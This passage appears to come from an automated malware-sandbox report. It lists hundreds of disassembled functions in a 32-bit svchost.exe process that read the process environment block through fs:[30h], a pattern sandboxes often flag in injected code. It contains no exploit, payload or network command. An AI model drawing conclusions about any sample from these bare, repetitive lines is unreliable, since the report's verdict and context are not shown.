Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h] (10 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
